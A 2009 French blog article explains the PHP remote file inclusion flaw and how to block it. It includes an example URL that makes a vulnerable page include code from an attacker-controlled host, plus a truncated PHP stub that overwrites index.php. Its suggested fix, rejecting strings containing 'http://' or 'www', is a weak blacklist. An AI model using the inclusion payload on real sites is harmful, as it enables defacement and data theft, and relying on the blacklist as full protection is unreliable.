faille include

mercredi 22 avril 2009
par  Jerome ROBERT
popularité : 6%

auteur : e


Et si votre site contenait une grosse faille de sécurité  : la faille include de php ????


Si vous avez des liens du type :


http://www.site.com/linux/index.php?file=intro.php


Alors pas problème ...

Le problème est qu’il n’y a peut
être pas de vérification sur $page avant l’include...

donc si on fait
http://www.site.com/linux/index.php?file=http://mon_site/hack

et si le fichier hack sur mon site
contient du code comme :


< ?php

$f=fopen("index.php", "w") ;

...

 ?>


On est capable d’écrire sur
l’index...

Pour boucher cette faille, il fait
faire des tests sur $page.


Si vous n’incluez que des fichiers php,
vous pouvez faire include($page.".php") comme ça les
liens seront :


http://www.site.com/linux/index.php?file=intro


Dans tous les cas, il faut ABSOLUMENT
refuser les $page contenant "http://" ou "www"
 !!!! pour éviter l’include à distance.

Il existe bien d’autres méthodes
de protection, je vous revoie sur internet, recherchez "faille
include php protection" dans google...

Cette faille est très sensible,
car on peut accéder à toutes les sources de vos
fichiers et y pécher des informations sensibles comme vos mots
de passe mysql par exemple, ou obtenir TOUTE votre base de donnée,
donc sur un site marchand toutes les informations des personnes
enregistrées (login, mot de passe, email, etc...).



Un exemple de teste a faire avant
d’effectuer un include :


if (strstr($file, "http://"))
$file="index.php" ;



Commentaires  Forum fermé

Navigation

Articles de la rubrique

Statistiques

Dernière mise à jour

mercredi 5 juillet 2017

Publication

264 Articles
Aucun album photo
Aucune brève
6 Sites Web
2 Auteurs

Visites

33 aujourd’hui
188 hier
549779 depuis le début
3 visiteurs actuellement connectés